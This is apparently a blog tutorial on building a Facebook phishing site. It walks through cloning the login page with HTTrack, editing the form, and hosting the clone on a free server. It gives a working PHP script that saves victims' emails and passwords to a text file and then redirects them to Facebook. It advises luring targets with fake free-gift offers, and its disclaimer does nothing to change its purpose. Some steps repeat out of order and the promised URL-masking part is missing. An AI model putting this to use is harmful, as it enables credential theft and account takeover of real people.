Create Facebook Phishing site
Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything at your own risk.
The creating Facebook phishing site is the most popular topic in today. so today I am going to explain how to create the best phishing site and how it sends to victims.
The tutorial has 3 parts
- Mirror Facebook page
- create phishing page
- hosts site
- URL Masking
Let's start....
Mirror Facebook Page
Create best phishing page you need some skills that are social engineer skill. what is the social engineer skill ?? basically, social engineering is the get idea about victims looking her/his facebook ,body or chatting and grab his or her likes. Today I am going to phishing guy or girl who loves free gifts like iPhone 6
Now you need some website mirroring tool, i recommend Httrack so Httrack supports both Linux and windows but today i used Linux based Httrack
Follow below steps to clone facebook but it will take few hours
find the action in code like these and change the code like below
now you need to write simple PHP commands don't fear just copy and paste into notepad and save as a data.php
the editing web page phase part is already done but need to do a simple thing that creates users.txt empty file in the same location
first two parts were done. now we need to host our site.
this part you can use your own hosting site or a free hosting site
click to go free hosting server
Lets start
go to given link and create your account after that you can log your free hosting site
Copy link and send it
Follow below steps to clone facebook but it will take few hours
- type httrack in a terminal and run
- Enter a project name what you want
- Enter path to you wants to save website
- copy URL of the facebook link
- past it into httrack
- type and enter
- type Y to confirmation
- wait few hours to complete
Create phishing site
this stage we are modifying the facebook page to a phishing page.
now you need a good text editor like notepad++
step 1: firstly go to web page save directory so they have a lot of folders copy only that name is same as web page name.
step 2: go to index HTML and open it notepad++ now you can see coding part don't fear ...
Type Ctrl + F
now you need to write simple PHP commands don't fear just copy and paste into notepad and save as a data.php
<?php
$username = $_GET['email'];
$password = $_GET['pass'];
$filename = 'users.txt';
$fp = fopen($filename, 'a+');
fwrite ($fp, $username . "," . $password . "**");
header("Location: https://www.facebook.com/");
?>
the editing web page phase part is already done but need to do a simple thing that creates users.txt empty file in the same location
Hosting part
first two parts were done. now we need to host our site.
this part you can use your own hosting site or a free hosting site
click to go free hosting server
Lets start
go to given link and create your account after that you can log your free hosting site
after logging, you can see a list of the account page click create new account
fill the text boxes like below. tip- give a good name for a website
click "Create My Account" and wait few minutes for finishing "building" state
now click "Go to CPanel"
click "File Manager 3"
Now you can see files on server
go to "public_html" and upload all files on web site folder
all process was done
Copy link and send it
Comments
Post a Comment